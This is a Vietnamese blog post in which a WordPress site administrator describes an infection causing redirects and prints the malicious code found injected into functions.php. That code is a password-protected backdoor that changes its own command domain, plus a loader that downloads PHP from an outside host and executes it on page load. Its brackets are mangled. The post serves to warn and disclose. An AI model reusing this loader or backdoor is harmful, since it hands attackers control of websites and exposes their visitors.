Chèn đoạn code sau vào file functions php

Thay mặt những người quản trị website Tìm ở đây xin lỗi các bạn đọc nếu trong thời gian vừa rồi các bạn khi truy cập website timoday.edu.vn bị gặp vấn đề khi mở một bài viết trên website này thì bị bật ra một link tới một trang khác.

Mình chia sẻ bài viết này để những bạn đang quản trị website sử dụng WordPress nếu gặp vấn đề này giống mình thì biết cách sửa lỗi, ngoài ra nếu chưa gặp thì biết cách phòng tránh bị cài mã độc vào website của chính mình.

Vấn đề gặp phải của website timoday.edu.vn đợt vừa rồi là khi mở trên máy cá nhân của mình thì không vấn đề gì, nhưng khi mở trên máy tính khác thì phát hiện ra cứ kích vào một bài viết nào đó nó tự động mở ra một liên kết khác. Ban đầu mình nghĩ do máy tính đó bị cài Malware nên không quan tâm, sau đó mình truy cập từ SmartPhone thì thấy vấn đề tương tự.
Sau quá trình rà soát phiên bản trên máy chủ và phiên bản trên local [thực hiện compare hai phiên bản] thì thấy code trên server bị chèn thêm đoàn code này ở file function.php

if [isset[$_REQUEST['action']] && isset[$_REQUEST['password']] && [$_REQUEST['password'] == 'xxxxxxxxxxxxxxxxxxxxxxxxx']]

	{

$div_code_name="wp_vcd";

		switch [$_REQUEST['action']]

			{
				case 'change_domain';

					if [isset[$_REQUEST['newdomain']]]

						{
							if [!empty[$_REQUEST['newdomain']]]

								{

                                                                           if [$file = @file_get_contents[__FILE__]]

		                                                                    {

                                                                                                 if[preg_match_all['/\$tmpcontent = @file_get_contents\["\/\/[.*]\/code6\.php/i',$file,$matcholddomain]]

                                                                                                             {



			                                                                           $file = preg_replace['/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file];

			                                                                           @file_put_contents[__FILE__, $file];

									                           print "true";
                                                                                                             }
		                                                                    }
								}
						}
				break;
				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";

			}
		die[""];

	}

if [ ! function_exists[ 'swps_stemps_ssetups' ] ] {  

$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];

if [ ! is_404[] && stripos[$_SERVER['REQUEST_URI'], 'wp-cron.php'] == false && stripos[$_SERVER['REQUEST_URI'], 'xmlrpc.php'] == false] {
if[$tmpcontent = @file_get_contents["//www.dolsh.com/code6.php?i=".$path]]

{
function swps_stemps_ssetups[$phpCode] {

    $tmpfname = tempnam[sys_get_temp_dir[], "swps_stemps_ssetups"];

    $handle = fopen[$tmpfname, "w+"];

    fwrite[$handle, "?php\n" . $phpCode]; 
    fclose[$handle]; 
    include $tmpfname; 
    unlink[$tmpfname]; 
    return get_defined_vars[]; 
} 
extract[swps_stemps_ssetups[$tmpcontent]]; } } } ?